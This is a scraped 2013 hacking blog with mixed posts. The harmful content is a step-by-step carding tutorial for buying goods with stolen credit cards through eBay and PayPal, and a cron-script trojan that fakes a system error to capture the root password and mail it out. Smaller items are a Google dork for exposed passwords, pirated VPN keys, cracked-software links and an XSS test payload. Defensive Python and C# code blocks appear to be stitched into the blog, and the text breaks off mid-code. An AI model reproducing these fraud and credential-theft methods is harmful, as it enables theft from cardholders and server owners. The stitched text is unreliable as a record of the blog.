Friday, April 5, 2013

Top 5 Penetration Testing Applications For Your Android Smart Phone

In The Previous Post I Shared The Top 5 Penetration Testing Operating Systems Based On Linux. In This Post I Am Sharing The Top 5 Penetration Testing Applications For Your Android Smart Phone. This Post Is Somewhat Linked To The Previous One, Because Android Is Also A Linux-Based OS :)) These Are Easy Tools Which I Am Also Using; You Can See The Screenshot Of My Phone Below.

Note : Your Phone Must Be Rooted To Use Them Properly ...

Let's Come To The Topic. My List Starts With :

Top 5 Penetration Testing Applications For Your Android Phone

1. dSploit : 

dSploit is an Android network analysis and penetration suite which aims to offer IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device. Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts' operating systems and running services, search for known vulnerabilities, crack logon procedures of many TCP protocols, perform man-in-the-middle attacks such as password sniffing (with common protocols dissection), real-time traffic manipulation, etc. This application is still in beta stage; a stable release will be available as soon as possible, but expect some crashes or strange behaviour until then. In any case, feel free to submit an issue on GitHub.

2. Shark :

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open the dump use Wireshark or similar software; to preview the dump on the phone use Shark Reader. Based on tcpdump.

3. The Android Network Toolkit :

At the last Defcon conference a new tool was released by a security researcher, and the tool is called “The Android Network Toolkit”. The toolkit has been developed for penetration testers and ethical hackers to test any network and its vulnerabilities by using their mobile phones. This toolkit contains different apps that will help any hacker to find vulnerabilities and possibly exploit them. The company behind the app is an Israeli security firm called Zimperium.

4. AnDOSid :

A DOS, or denial of service, attack is very dangerous because it takes down the server (computer). AnDOSid allows security professionals to simulate a DOS attack (an HTTP POST flood attack to be exact) and of course a DDoS on a web server, from mobile phones. AnDOSid is designed for security professionals only!

5. Nmap :

Nmap (network mapper) is one of the best network scanner (port finder) tools. Nmap was mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for Android is an Nmap app for your phone! Once your scan finishes you can e-mail the results. This application is not an official app but it looks good.

 

Posted By Unknown 9:47 AM

Saturday, March 2, 2013

Express VPN Premium VPN Worth 13$ For Free

Hi Guys This Is DJ Alone... Today I'm Posting KEY For Express VPN...


Express VPN is a Premium VPN... U Had To Pay 13$ Every Month If U Want To Use That...


First Of All Download The Express VPN From Here...

http://www.mediafire.com/?w9l84ohy17539s2

Then Install It... & It Will Ask The KEY...

Download Its Premium KEY From BELOW Link & Enter It In EXPRESS VPN...

http://www.mediafire.com/view/?iviqjv6j2tijz1j

Working ScreenShot For Express VPN Taken On 3 Mar 2013...

If That Key Is Not Working For U...
Use This...
EQK9I206TKTYY7WEP6MYVHN


Hurry Download The Software & Key...

Note :- Key is Valid For One Month... But Expires Tomorrow So Download It & Use It...

Posted By आर्यावर्त 11:15 PM

Real SQL V0.3


Here comes a post after a long holiday from blogging due to my exams. This is about one of my fav SQLi scanners. It's called Real SQLi. Just found this so thought of posting here.
What it does is search through Google, using Google Dorks, and try each website for an SQL Injection vulnerability; if it is successful it will return the vulnerable link to you!
This is the main GUI of the application, and in later screenshots I will show you its features.


Here is the search function and you can see it is returning a vulnerable URL
The search is complete and there were 3 vulnerable URLs found!

This is the save button making a .txt file of all the working links
Showing the contextual menu in the results box  

Download this from here : http://dl.dropbox.com/u/98292500/Real%20SQL.exe

...PROTOTYPE...

Posted By z0mb13 6:35 AM

Thursday, February 28, 2013

GO DADDY COUPON CODE - Buy Domain At 1.49 $

Hi Guys This is DJ Alone... I'm Sharing A Coupon Code For GODADDY.COM...

BY Using This Coupon U Can Buy .COM Domain In Only 1.49$ (91.36 INR.)

Just Go To GoDaddy.Com

Go Daddy Is The Most Famous Domain Provider... Best Domain Providers...




Use This Coupon Code...To Buy Domain at 1.49 $




LKSRTL149

This Code Is Expiring On 1 March 2013...

Posted By आर्यावर्त 5:53 AM

Wednesday, February 27, 2013

What Is Socks ?

Hi Guys This Is DJ Alone... In This Post I Will Tell U...

What is Socks ???


SOCKets or SOCKS-Proxies (=Secured Over Credential-based Kerberos Services) are very similar to HTTP proxy servers. The main difference is that they have the capability to redirect all traffic (Web, FTP, POP3, Torrent…) through a proxy server, while HTTP proxies only redirect HTTP (port 80) requests.

SOCKS proxies have a wide range of benefits, but the most important is that they provide complete anonymity and protect all your traffic (including DNS requests). This means that the remote server will only see the SOCKS server's IP (Internet Protocol) address instead of the real IP you got from your Internet Service Provider. Hence, absolute anonymity is evident.


But why generally use a Proxy or is it better to surf without one?

1. To hide your real identity/IP-Address

2. Unblock websites (some countries/ISP's block websites or social networks like facebook, twitter, youtube)

3. Bypass your proxy at school or work

4. Very usable for SEO programs

A few SOCKS Proxies even support the SMTP-Port (25) which allows you to send the Emails anonymously.

If you want to extend your anonymity you can chain different kinds of proxies together.

Examples:
SOCKS Proxy > HTTP Proxy > CGI Proxy
SOCKS Proxy > HTTP Proxy
HTTP Proxy > SOCKS Proxy
SOCKS Proxy > CGI Proxy

There are a few programs to run your own SOCKS-Proxy-Server like: SS5, WinSocks, OpenSSH, Dante, Sun Java System Web proxy, Free Cap and Freeproxy.

The benefit of using a public SOCKS5 list instead of a private server is that you get a wide range of IP addresses and servers from all over the world, which hides your identity even more.


How to use socks (Firefox) ???

Firefox is the most powerful and extendable browser in the world. So how do you use socks with Firefox 3, and is it hard to configure and use? No, it is easy.

Run Firefox

Go to Tools  → Options


Click Advanced and choose Network, then Settings
Choose Manual proxy configuration, then enter the IP address in SOCKS Host and the port in Port

After that choose SOCKS v4 for version 4 of socks or SOCKS v5 for version 5 of socks...



Click OK

Enjoy using socks in Firefox

For comfortable socks switching and configuring you can use FoxyProxy extension for Firefox...

Posted By आर्यावर्त 6:41 AM

What Is Carding ? Carding Tutorial

Hi Guys This Is DJ Alone...
In this tutorial , i will teach you the terms “carding” , “scamming” , “cvv2″ etc. I’ll also tell some tricks for sites such as ebay.com , ebay.co.uk , actually just ebay

 let’s start with explaining the term “CARDING”

 Chapter 1 : Introduction and Tips.

 Carding , or scamming as other people would say , is an art. It’s basically ordering items from the Net (cellphones , laptops, PDA’s , TV’s ,……) without actually
 paying for it . or at least , not paying with your own money

 Now you’ll all be wondering how we do this stuff.
 Well , most sites accept credit cards as a payment form . These credit cards can be obtained from mIRC or from public forums , which i won’t display here
 due to security reasons.

 For the dummies : a creditcard is a 16 digit number which can be used to pay , some sort of bank card.

 There are different types of creditcards :

 Visa
 Mastercard(MC)
 American Express (AMEX)
 Discover
 Novus
 JCB

 When you obtain a creditcard , you have to recognise the type .

 A card starting with a 4 is a Visa , with a 5 is a Mastercard , with a 3 (15 digits long) is an Amex , with a 6 is Dicover/JCB.

 Some sites might ask for a CVV2 , this is the tree digit verification code on the back of the card.
 Mostly this is also pasted on the forum or mIRC channel.

 Note : Amex has a 4 digit verification code , and for discover 000 can be used.

 Now there are some tips and tricks when you want to order something .

 * Look for a site with a shitty layout , they’ll probably have a shitty security and are “cardable” (this means you cane asily get stuff from the site )
 * Try to use Discover or Amex , these cards are less involved with chargebacks etc and most merchants (payment processors) won’t verify these cards , instead of visa and
 mastercard , which have alot of chargebacks.
 * Don’t use a store in your own country , especially not big ones . Ebay.co.uk is one of the best cardable sites if you have the right techniques..

 When ordering , sites will ask for a billing adress and a shipping adress.
 The billing adress is the adress listed on the creditcard , the shipping adress is your adress or a drop adress , a so called “delivery adress”.

 As you might have noticed , i oftenly mentioned ebay as a site to buy goods from.
 But ebay doesn’t use an instant paying service , they offer online paying services such as Paypal and Auctionpayments.com .
 These sites gladly accept all types of creditcards , from all over the world .

 Chapter 2 : Ebay , Paypal.com

 Ebay

 As you will probably know , ebay.com is an online auction site where goods can be sold and bought by people over the world.
 This site is one of the most visited shopping sites , because of its large variety of goods and prices , which can be lower then store prices.

 Now the question is : how to contact the seller and arrange the fraudulent deal.

 Well , to contact the seller you will need an ebay buyer account.This means you have to register yourself at www.ebay.com , and do NOT use your real information , because
 they will ask you to provide a creditcard and that one has to match with the adress on the card , so just use the cardholder’s info.
 Also use a valid email adress , a yahoo or hotmail one for example , because you have to confirm your registration , and also the seller(s) will reply to you on that email adress.

 If you see an item and you want to buy it , first ask the seller a question.
 A question which will work well is the following one :

 Hi there,
 i am from USA and i am interested in purchasing this item from you .
 i would like to pay this item with my paypal
 But the item is a gift for my cousin in Belgium
 can you gift wrap the package and calculate shipping costs for 2-3 days delivery?
 please reply me with a total price and your paypal adress.

 With this message i received alot of items , including cellphones , a PDA , shoes , a laptop , software, etc.

 Paypal

 Now i will (finally) explain the meaning of the word Paypal.

 Paypal.com us an online payment method , which is used by alot of ebayers , and can be funded by bank transfers or creditcards (whoohoo)

 All you need for this is a USA cvv2 (see chapter 1) and a valid email adress.

 Visit www.paypal.com & click on Register/Sign up.
 Fill in the form with the creditcard info (name , adress, city, state, zipcode , country , etc) and the email adress you are using for Ebay.
 On the bottom of the page they will ask you to pick 2 security questions and give an answer on those questions , in case you forget your password.
 Pick any random question and fill it in with random info , paypal cannot verify it .
 After you have signed up , go to your email inbox & click on the paypal email .
 Inside you will find a link which you’ll have to click in order to confirm the registration. You’ll visit a page which will ask you to confirm your paypal password.
 Fill it in, click on submit , and paypal will ask you to add a bank account. We aren’t interested in this , so click on Skip.
 Then you’ll see your account overview. In the left menu , click on Add a Credit Card.
 On that page it’ll ask you the cardholder’s name , the ccnumber , type of creditcard (see chapter 1) , the expiry date and the Cvv2 (cfr. Chapter 1)
 If all information is valid , click on Submit and hopefully you’ll get a message saying : you have succesfully added a creditcard . Blablablaa…….
 If you are unlucky , you’ll get one of the following errors :

 * This creditcard has already been assigned to another paypal account , please use a different card.(no explenation needed)
 * You have entered an invalid or partial credit card number (cc number is incorrect)
 * Your card has been declined because we could not verify the 3-4 digit code on the back of your card . (cvv2 is invalid)
 * This card has been declined by your bank issuer . (card is invalid)

 After you have successfully added a card , look in your email inbox for some replies from sellers which will contain a full price for the item.
 Go to your paypal account, click on Send Money.Fill in the recipient (seller’s paypal email) , the amount , and pick Auction Goods (non Ebay)
 on the next page create a item number (10 digits maxium) , and a buyer ID (johndoe4852 for example). As auction site , select Other.
 Then click on Continue , it’ll bring you to a new screen to confirm the information you entered.
 As funding source , you’ll see that the credit card is selected .
 On bottom you ‘ll see that paypal automatically selects the credit card adress as shipping adress. Leave this indicated like this , it’ll give the transaction a very legit look.
 Then click on Confirm and hope for the best . If your purchase was succesfull , you’ll get a message saying you’ve sent cash or you paid for an online auction.
 Then return to your paypal account & Log Out . Go to your inbox , tell the seller the money has been sent and provide the shipping adress in the email.
 Also ask him to mail you back once the package is shipped...

Credits To :- LNXROOT.NET

Posted By आर्यावर्त 5:54 AM

Monday, February 18, 2013

Get Usename & Password Database By Google

This Tutorial Is about Finding Username, Passwors, Databases with Google
so lets Start ...  


1- open Google.com

2- Enter This Dork 
  • filetype: This "pdo_mysql" (pass | passwd | password | pwd)   
See the Search Results Almost 10,900
If you did nt find this type results then click on 2-3-4.....30 pages. finally you'll find many websites...

Now Click on site, You will got all datbase of website,

Posted By आर्यावर्त 8:18 AM

Sunday, February 17, 2013

12 Ways To Improve Your Chance On Getting AdSense Approval

Hi Guys...This Is DJ Alone... Health is Low At This Time Also... Unable To Speak...But Had To Do Work... I'm Recently Tried To Approve Google AdSense... But They Rejected Me Third Time...So, I Do Some Research On That... Hope U Guys Also Want To Join AdSense... Some Of You Already Gets It...Some Of You Guys is Waiting... So , Here is a Way To Improve Ur Chance In Getting AdSense Approval... Must Try This Steps Once...

All You have to do is Do The Following things before applying for adsense...

What is AdSense ? Why U Should Use Google AdSense ?

Google Adsense is world’s largest Ads Network and works at Pay Per Click system...It’s paying rates are better than all of other networks which is the biggest reason it is so popular to all Bloggers and Webmasters...So,Everybody is running behind them, That Why they have made the approval system very strict... You make little mistakes and get disapproved every time...So, you need a complete guidance and list of thing that you need to do before applying for Google Adsense and i m thinking that you are ready to follow me...



12 Things You Had To Do Before Applying for Google Adsense :-

1. Privacy Policy :-

One of the common mistake that every Blogger makes...Even though there are people out there who say that having a Privacy Policy for a Blog doesn’t makes sense but they are Completely wrong...

A Privacy actually describes to your readers about what they will get on your Blog,what they should do and what they should not...So,obviously there is nothing bad in having a Privacy Policy... 

While it can affect somehow on your Adsense Approval, you must give it a try... You can write it yourself or find Privacy Policy Generators online...

2. About Page

About Page has a major role & importance if you don’t want to apply for Adsense... But when it comes to Adsense, there are about zero chances of getting approved if you are not showing this page... The About page simply describes you & your Blog... This will not only help you make a relationship with readers but it will also make them trust you...

3. Contact Us Page

This Page Gives Opportunity to Your Readers To Contact You... & Speak with you and tell how they feel about your Blog...what they want to be edited & what they liked or hated...
It will also show the Google Adsense Team that is viewing your site that you actually care about your readers and not only the money and Adsense...

4. Name/ Email Verification



Make sure to put your name & Email address in some easily visible area like About Me & Contact Us pages...It will confirm to Google Adsense Team that it is the same person who applied for Adsense and not some spam Or Some crappy bots...

5. Age Verification

If You Are Not Getting AdSense You Are Not 18 + (Obviously Google Thinks It)... Because Google Adsense is not for under 18 people... I realized this problem after a Lot Of Research About It... So, I advise you to be accurate while typing your age...

6. Minimum Number of Posts

There is no exact answer about this...Not even a Single One...Because I have seen very a Lot Of Blogs with 500+ posts & their owners are telling me that Google Adsense is rejecting them...While People with 40-50 posts are enjoying making money...Exactly what I said that there is no actual answer...
However,we can always try with People's Predictions...According to my Research,you should only apply When you have more than 70 posts...
Post's length must be 500+ words too...

7. Design

Your Blog's Design is the biggest thing after Its Content...This represents your experience and Professionalism...So be careful because anything can kill your Chances...

8. Content Type

Be careful with what type of content you are publishing...Because it is something that truly matters...Google Adsense is not for Pornographic, Illegal Items, Drugs or other Blogs/Sites like that...
Also Adsense team won’t allow you to step in if you own a Non English Blog...Having posts shorter than 300 words in length is also Cause You a Red Signal...

9. Providing Value

Don’t complain about not making money and don’t clearly state that your are Blogging for Money only & has no other interest in it...Because this will show them that you will not be providing values to your readers any day...And You Will Get another Red Light...

10. Top Level Domain

Those Days are gone far away when AdSense is used to approve “Blogspot” and “WordPress.com” Blogs...As for today, you must have your own Unique Domain that specifies your Blog...If you don’t have one yet,stop Dreaming about getting approved with Sub domains...So, go buy a Top Level Domain...

Another important thing about The Domain is.. It's Age...Because For most of Asian Countries AdSense has placed an Age Restriction...They Don’t Accept any sites Before they are 6 months old... As i Heard From My Friend...


11. Other Ad Networks

If you have any other Ads placed like Chitika,Clicksor Or anything,It’s time Remove Them When You Are Submitting For Approval...

Even Google Adsense allows you to use other Ad Networks along with them,it’s better to remove the ads before Applying & don’t put them back until you get a reply from Adsense Team...

12. Paid Traffic

Google hates the sites that are getting Paid traffic...So,there is not a damn chance of getting Adsense Approval letter for a site that is getting paid traffic...You can bring traffic from Search Engines Or From any other way you want..
But if you want to earn via Google Adsense By the right way Then paid traffic is not a solution...

What To Do IF Adsense Is Not Getting Approved ???

If google adsense still not approving your website/blog...You can use these websites to earn money without adsense...

Affiliate Marketing
Bidvertise
Chitika
ClickSor

InfoLinks

ReviewMe



This will take your few time & you have to Do these things Before Applying for Google Adsense...
I guess these things are not too hard...Don’t be sad if Google adsense not approve your blog...There are many other ways to make money online without adsense...






Posted By आर्यावर्त 2:06 AM

Wednesday, February 13, 2013

Rooting a Server without Local Root Kernel Exploits

Hi Guys...This is DJ Alone...Last Days I Got 3 Servers...Its Just a Good Week For Me...And Today I Got A Little Health Problems Also...But I Decided To Share a Good Method With U Guys...

When Ever We Got Server We Want To Root It...So We Are Trying To Beg LOCAL Root Kernel Exploit... Recently i Saw a Method That is Easy and It Can Help Us Rooting The Server...So Let's Move To The Topic...

How to Root a Server when there isn’t any Local Root Kernel Exploit available ???


You can do it with Cron Tab Scripts...

Cron Jobs are some Tasks that are set to be Executed at a specific time.If the Root user has created a Custom Script used by Cron, then we can
Write on this File, we can send a “Fake” Error Message and the Root user will probably type his password...


First, check out if there are any Cron Job Tasks :-

Code :-

crontab -l

okay we got a Custom script here , you can see backup.sh is the script...



here you can see it has 755 permission

Make a Copy of the Original Script !!

Okey now replace the code of original file with this :- 


Code :-


#!/bin/shecho “An System Error Occured!”
echo “”echo “Error Code: #131425″echo “”echo “Update to get the Latest Patch for this Security Issue.”read -s -p “[sudo] password for root ” rootpasswdecho “”echo “su: Authentication failure”echo “”sudo apt-get update && sudo apt-get upgradesudo echo “The Password is: $rootpasswd” > .kodmail -s “Root’s Password” “email@address.com” < .kodrm .kodmv backup.sh backup



You just had to Replace the E-mail id with your E-Mail and the Name of the Script...

After you save the File, 

type: chmod +x cronscript to set it as Executable...

This script will:

- Send a Fake Error Message

- Request for the Root’s Password

- Send to your E-Mail Address the Password (make sure that there is the “mail” command at the /bin)

When the Script gets Executed, the Root User will Enter his Password and it will be send to you...

Posted By आर्यावर्त 3:18 AM
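
The weakness the post above depends on is a root cron job that runs a script a non-root account can modify. The audit below is an added example, not code from the original post: it parses root's crontab -l output and reports every referenced script, or directory above it, that is owned by a non-root uid or is group- or world-writable. The backup.sh sample and its contents are constructed.

```python
import os
import re
import shlex
import stat
import tempfile

ENV_LINE = re.compile(r"^\w+\s*=")   # environment lines such as MAILTO=root


def cron_commands(crontab_text):
    """Return the command part of every job line in `crontab -l` output."""
    commands = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        # "@daily cmd" has one schedule field, the classic form has five.
        schedule_fields = 1 if line.startswith("@") else 5
        parts = line.split(None, schedule_fields)
        if len(parts) == schedule_fields + 1:
            commands.append(parts[-1])
    return commands


def referenced_paths(command):
    """Absolute paths named in a command: interpreter, script, arguments."""
    try:
        tokens = shlex.split(command)
    except ValueError:               # unbalanced quotes: split on whitespace
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def assess(uid, mode, trusted_uids=(0,)):
    """Findings for one owner uid and st_mode value (pure, no filesystem)."""
    findings = []
    if uid not in trusted_uids:
        findings.append("owned by uid %d" % uid)
    # In a sticky directory (e.g. /tmp) write access does not allow replacing
    # another user's file, so its write bits are not reported.
    if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
        return findings
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def audit_path(path, trusted_uids=(0,)):
    """Check a file and every directory above it; return (path, finding)."""
    current = os.path.realpath(path)
    try:
        if not stat.S_ISREG(os.stat(current).st_mode):
            return []                # devices such as /dev/null are not scripts
    except OSError:
        return [(current, "missing or unreadable")]
    results = []
    while True:
        st = os.stat(current)
        results += [(current, f)
                    for f in assess(st.st_uid, st.st_mode, trusted_uids)]
        parent = os.path.dirname(current)
        if parent == current:
            return results
        current = parent


def audit_crontab(crontab_text, trusted_uids=(0,)):
    """Audit every path referenced by the jobs of a root crontab."""
    results = []
    for command in cron_commands(crontab_text):
        for path in referenced_paths(command):
            for item in audit_path(path, trusted_uids):
                if item not in results:
                    results.append(item)
    return results


def make_demo_job(directory, mode=0o755):
    """Constructed sample: write backup.sh and return a crontab that runs it."""
    script = os.path.join(directory, "backup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\ntar czf /var/backups/site.tgz /var/www\n")
    os.chmod(script, mode)
    return ("# m h dom mon dow command\nMAILTO=root\n"
            "0 3 * * * %s > /dev/null 2>&1\n" % script)


if __name__ == "__main__":
    # Run as an ordinary user: the 755 script is still reported, because its
    # owner (not root) can rewrite it, which is the case the post describes.
    with tempfile.TemporaryDirectory() as tmp:
        for path, finding in audit_crontab(make_demo_job(tmp)):
            print("%s: %s" % (path, finding))
```

Any script reported here should be owned by root, mode 755 or stricter, and kept in a directory only root can write to.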

Sunday, February 10, 2013

IDM 6.15 PreActivated (Download)

Posted By आर्यावर्त 4:47 AM

Wednesday, February 6, 2013

Acunetix 8 Full Version Download

Acunetix Scanner v8.0.20111215 Cracked

Posted By आर्यावर्त 8:51 AM

What Is Acunetix ?

Hi Guys... This is DJ Alone... Today I Was Just Checking My Friend's Site... and Found A Lot Of Vulnerabilities In It... How To Check Whether Ur Website Is Vulnerable Or Not... So Let's See What It Can Do For Us ?

What Is Vulnerability ?

In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance...
Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw... To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface...

What Is Acunetix ?


Acunetix is a Vulnerability Scanner That Helps U To Find Vulnerabilities In Ur Site... It Is A Most Used Tool... By Using Acunetix U Can Easily Find Vulnerabilities In Ur Site... U Can Easily Fix Errors & Secure Ur Website...


Is Your WebSite Vulnerable ?

  • 70% of all cyber-attacks target web applications
  • Make sure your website isn't vulnerable to web attacks
  • Check if it is with Acunetix WVS

Easily Scan Your Website For

  • SQL Injection
  • Cross-Site Scripting
  • Other vulnerabilities

Generate Regulatory Compliance Reports

  • PCI DSS Data
  • OWASP Top 10 Vulnerabilities
  • HIPAA Compliance Reports

Advanced Penetration Testing Tools

  • HTTP Editor
  • Sniffer
  • Fuzzer
  • and more...

Scan Web 2.0 Applications

  • State of the art CSA engine
  • Comprehensive scan of latest web technologies

In Next Post I Will Post The Link Of Acunetix For My Readers...

Posted By आर्यावर्त 8:31 AM

Tuesday, February 5, 2013

What is SEO ?

Hi Guys... This is DJ Alone... It's Too Late That I'm Writing This Article... But... Some People Keep Asking Me What is SEO ? Plz Teach Me SEO ? So, I Made This Post For Them...

Search engine optimization (SEO) is the process of affecting the visibility of a website or a web page in a search engine's "natural" or un-paid ("organic") search results. In general, the earlier (or higher ranked on the search results page), and more frequently a site appears in the search results list, the more visitors it will receive from the search engine's users. SEO may target different kinds of search, including image search, local search, video search, academic search,[1] news search and industry-specific vertical search engines...

People Search Almost 16 Billion Queries Every Month... & Every Site Wants To Get A High Rank... and get the leverage on pay per click advertisements. And hence the visitors are turned into a medium of earning. One must follow a strategy in order to boost his or her website. If you don't understand how to apply these strategies then your customers are diverted to your competitors...

In technical words this strategy is called Search Engine Optimization (SEO). SEO is the process of improving the visibility of a website or a web page in search results. It is a method of getting your website to a higher rank in search engines like Google, Yahoo and Bing...

When a user searches some relevant content in Google or Yahoo, you want your website to be the first link in the search result. SEO helps the search engines to recognize your website for the search of specific keywords. Optimizing a website may involve editing its content and HTML and associated coding to both increase its relevance to specific keywords. All in all the search engine optimization process includes researching keywords, creating content and making sure your website is visible in the search engines. Promoting a site to increase the number of backlinks, or inbound links is another SEO

Posted By आर्यावर्त 8:49 AM

Sunday, February 3, 2013

How To Prevent Cross-Site Scripting (XSS) in ASP.NET

Hi Guys... This is DJ Alone... This Time I Thought To Help U Guys By Posting How To Prevent XSS...

So, I'm Posting This... By This Post U Can Easily Secure Ur Website From Cross-Site Scripting Attacks...

In Previous Posts We Have Seen What Cross Site Scripting Is & How It Works.... If U Are Reading This Post For The First Time... First Read The XSS Post Here...


This How to shows how you can help protect your ASP.NET applications from cross-site scripting attacks by using proper input validation techniques and by encoding the output. It also describes a number of other protection mechanisms that you can use in addition to these two main countermeasures.

Cross-site scripting (XSS) attacks exploit vulnerabilities in Web page validation by injecting client-side script code. Common vulnerabilities that make your Web applications susceptible to cross-site scripting attacks include failing to properly validate input, failing to encode output, and trusting the data retrieved from a shared database. To protect your application against cross-site scripting attacks, assume that all input is malicious. Constrain and validate all input. Encode all output that could, potentially, include HTML characters. This includes data read from files and databases.

Contents

Objectives
Overview
Summary of Steps
Step 1. Check That ASP.NET Request Validation Is Enabled
Step 2. Review ASP.NET Code That Generates HTML Output
Step 3. Determine Whether HTML Output Includes Input Parameters
Step 4. Review Potentially Dangerous HTML Tags and Attributes
Step 5. Evaluate Countermeasures
Additional Considerations
Additional Resources

Objectives

Understand the common cross-site scripting vulnerabilities in Web page validation.
Apply countermeasures for cross-site scripting attacks.
Constrain input by using regular expressions, type checks, and ASP.NET validator controls.
Constrain output to ensure the browser does not execute HTML tags that contain script code.
Review potentially dangerous HTML tags and attributes and evaluate countermeasures.

Overview

Cross-site scripting attacks exploit vulnerabilities in Web page validation by injecting client-side script code. The script code embeds itself in response data, which is sent back to an unsuspecting user. The user's browser then runs the script code. Because the browser downloads the script code from a trusted site, the browser has no way of recognizing that the code is not legitimate, and Microsoft Internet Explorer security zones provide no defense. Cross-site scripting attacks also work over HTTP and HTTPS (SSL) connections.

One of the most serious examples of a cross-site scripting attack occurs when an attacker writes script to retrieve the authentication cookie that provides access to a trusted site and then posts the cookie to a Web address known to the attacker. This enables the attacker to spoof the legitimate user's identity and gain illicit access to the Web site.

Common vulnerabilities that make your Web application susceptible to cross-site scripting attacks include:

Failing to constrain and validate input.
Failing to encode output.
Trusting data retrieved from a shared database.

Guidelines

The two most important countermeasures to prevent cross-site scripting attacks are to:

Constrain input.
Encode output.

Constrain Input

Start by assuming that all input is malicious. Validate input type, length, format, and range.

To constrain input supplied through server controls, use ASP.NET validator controls such as RegularExpressionValidator and RangeValidator.
To constrain input supplied through client-side HTML input controls or input from other sources such as query strings or cookies, use the System.Text.RegularExpressions.Regex class in your server-side code to check for expected input by using regular expressions.
To validate types such as integers, doubles, dates, and currency amounts, convert the input data to the equivalent .NET Framework data type and handle any resulting conversion errors.

Encode Output

Use the AntiXSS.HtmlEncode method to encode output if it contains input from the user or from other sources such as databases. HtmlEncode replaces characters that have special meaning in HTML with the HTML entities that represent those characters. For example, < is replaced with &lt; and " is replaced with &quot;. Encoded data does not cause the browser to execute code. Instead, the data is rendered as harmless HTML.

Similarly, use AntiXSS.UrlEncode to encode output URLs if they are constructed from input.

Summary of Steps

To prevent cross-site scripting, perform the following steps:

Step 1. Check that ASP.NET request validation is enabled.
Step 2. Review ASP.NET code that generates HTML output.
Step 3. Determine whether HTML output includes input parameters.
Step 4. Review potentially dangerous HTML tags and attributes.
Step 5. Evaluate countermeasures.

Step 1. Check That ASP.NET Request Validation Is Enabled
By default, request validation is enabled in Machine.config. Verify that request validation is currently enabled in your server's Machine.config file and that your application does not override this setting in its Web.config file. Check that validateRequest is set to true as shown in the following code example.

<system.web>
  <pages buffer="true" validateRequest="true" />
</system.web>

You can disable request validation on a page-by-page basis. Check that your pages do not disable this feature unless necessary. For example, you may need to disable this feature for a page if it contains a free-format, rich-text entry field designed to accept a range of HTML characters as input.

To test that ASP.NET request validation is enabled

Create an ASP.NET page that disables request validation. To do this, set ValidateRequest="false", as shown in the following code example.
<%@ Page Language="C#" ValidateRequest="false" %>
<html>
 <script runat="server">
  void btnSubmit_Click(Object sender, EventArgs e)
  {
    // If ValidateRequest is false, then 'hello' is displayed
    // If ValidateRequest is true, then ASP.NET returns an exception
    Response.Write(txtString.Text);
  }
 </script>
 <body>
  <form id="form1" runat="server">
    <asp:TextBox id="txtString" runat="server"
                 Text="<script>alert('hello');</script>" />
    <asp:Button id="btnSubmit" runat="server"
                OnClick="btnSubmit_Click"
                Text="Submit" />
  </form>
 </body>
</html>

Run the page. It displays Hello in a message box because the script in txtString is passed through and rendered as client-side script in your browser.
Set ValidateRequest="true" or remove the ValidateRequest page attribute and browse to the page again. Verify that the following error message is displayed.
A potentially dangerous Request.Form value was detected from the client (txtString="<script>alert('hello...").

This indicates that ASP.NET request validation is active and has rejected the input because it includes potentially dangerous HTML characters.

Note: Do not rely on ASP.NET request validation. Treat it as an extra precautionary measure in addition to your own input validation.


Step 2. Review ASP.NET Code That Generates HTML Output
ASP.NET writes HTML as output in two ways, using "Response.Write" and "<% = ". Search your pages to locate where HTML and URL output is returned to the client.

Step 3. Determine Whether HTML Output Includes Input Parameters
Analyze your design and your page code to determine whether the output includes any input parameters. These parameters can come from a variety of sources. The following list includes common input sources:

Form fields, such as the following:
Response.Write(name.Text);
Response.Write(Request.Form["name"]);

Query strings, such as the following:
Response.Write(Request.QueryString["name"]);
Response.Write(Request.QueryString["username"]);

Databases and data access methods, such as the following:
SqlDataReader reader = cmd.ExecuteReader();
Response.Write(reader.GetString(1));

Be particularly careful with data read from a database if it is shared by other applications.

Cookie collection, such as the following:
Response.Write(
Request.Cookies["name"].Values["name"]);

Session and application variables, such as the following:
Response.Write(Session["name"]);
Response.Write(Application["name"]);

In addition to source code analysis, you can also perform a simple test by typing text such as "XYZ" in form fields and testing the output. If the browser displays "XYZ" or if you see "XYZ" when you view the source of the HTML, your Web application is vulnerable to cross-site scripting.

To see something more dynamic, inject <script>alert('hello');</script> through an input field. This technique might not work in all cases because it depends on how the input is used to generate the output.
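
Steps 2 and 3 can be started mechanically. The following added example (not code from the original guidance) finds the Response.Write and <%= output points and reports those whose argument names one of the input sources listed above without an HtmlEncode or UrlEncode call. The class name is hypothetical, the sample text is constructed, and the match is a heuristic for review triage: it does not follow values assigned to variables.

```csharp
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;

// Added example; OutputSinkReview is a hypothetical name.
public static class OutputSinkReview
{
    // An output point and its argument, up to the end of the statement or the closing %>.
    static readonly Regex Sink = new Regex(
        @"(Response\.Write\s*\(|<%\s*=)(?<arg>.*?)(;|%>)", RegexOptions.Singleline);

    // Input sources listed in Step 3.
    static readonly Regex Source = new Regex(
        @"Request\.(Form|QueryString|Cookies)\b|\b(Session|Application)\s*\[" +
        @"|\.GetString\s*\(|\.Text\b");

    // Encoding calls that count as a countermeasure.
    static readonly Regex Encoder = new Regex(@"\b(HtmlEncode|UrlEncode)\s*\(");

    public static List<string> Review(string code)
    {
        List<string> findings = new List<string>();
        foreach (Match m in Sink.Matches(code))
        {
            string arg = m.Groups["arg"].Value;
            if (!Source.IsMatch(arg) || Encoder.IsMatch(arg)) continue;
            // 1-based line number of the start of the statement.
            int line = code.Substring(0, m.Index).Split('\n').Length;
            findings.Add("line " + line + ": input written without encoding: "
                         + Regex.Replace(arg, @"\s+", " ").Trim());
        }
        return findings;
    }

    public static void Main()
    {
        // Constructed sample modeled on the statements shown in this How To.
        string sample =
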